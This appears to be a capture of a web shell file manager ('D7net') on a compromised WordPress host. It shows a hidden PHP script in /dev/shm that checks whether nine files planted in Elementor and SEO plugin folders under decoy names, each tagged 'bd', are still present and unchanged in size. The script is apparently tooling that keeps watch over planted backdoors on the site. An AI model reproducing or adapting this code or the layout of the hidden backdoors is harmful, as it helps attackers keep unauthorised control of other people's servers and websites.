D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
dev
/
shm
/
Filename :
.elem
back
Copy
<?php $r = '/home/olsoruwm/llanhurst.com'; $x = ["/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Runtime/manifest.php"=>"bd@@426527@@891", "/wp-content/plugins/wordpress-seo-extended/vendor_prefixed/wordproof/wordpress-sdk/app/Exceptions/is_scalar.php"=>"bd@@373793@@585", "/wp-content/plugins/wordpress-seo-extended/vendor_prefixed/wordproof/wordpress-sdk/app/Translations/usercp_confirm.php"=>"bd@@426546@@599", "/wp-content/plugins/wordpress-seo-extended/src/editors/domain/analysis-features/analysis.feature.php"=>"bd@@373834@@704", "/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Sandbox/theme_blocks.php"=>"bd@@423249@@579", "/wp-content/plugins/wordpress-seo-extended/vendor_prefixed/wordproof/wordpress-sdk/app/Controllers/fortran.php"=>"bd@@361123@@1153", "/wp-content/plugins/wordpress-seo-extended/vendor_prefixed/wordproof/wordpress-sdk/app/Support/product_info.php"=>"bd@@384223@@1105", "/wp-content/plugins/wordpress-seo-extended/src/actions/importing/aioseo/aioseo.cleanup.settings.settings.action.php"=>"bd@@397547@@683", "/wp-content/plugins/elementor/modules/atomic-widgets/props-resolver/transformers/export/image.src.export.transformer.php"=>"bd@@426560@@921"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');